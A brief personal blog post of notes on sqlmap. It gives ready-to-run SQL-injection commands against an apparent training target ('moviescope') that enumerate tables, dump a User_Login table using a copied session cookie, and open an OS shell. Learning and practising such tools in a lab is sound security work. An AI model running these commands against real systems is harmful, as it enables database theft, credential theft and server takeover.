Sistema de blogs Diarium
Universidad de Salamanca
Pablo Gallardo's Blog
My professional web log about IT, Cybersecurity & Project Management
 

sqlmap

sqlmap is a command line tool to automatize SQL injections.

Examples

Retrieve tables on DB (–tables;)] specify database with -D:
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie=<"cookie value which you have copied in step #5"> -D moviescope --tables

Retrieve columns from a table in DB –columns;
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie=<"cookie value which you have copied in step #5"> -D moviescope -T User_Login --columns

Dump content of a table from DB –dump;
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie=<"cookie value which you have copied in step #5"> -D moviescope -T User_Login --dump

Gain access to OS shell

sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie=<"cookie value which you have copied in step #5"> --os-shell

pmgallardo

About pmgallardo

I studied Computer Science at University of Salamanca. Since then, I have been working first as developer and then as SAP consutant. This blog is about problems I dealt when using computers, and more important, the solutions I found. Whenever I am on an issue and suddenlly I have a flash that leads me to a solution, I document my discoveries in a post.

, ,

No comments yet.

Leave a Reply


*

Política de privacidad
Studii Salmantini. Campus de excelencia internacional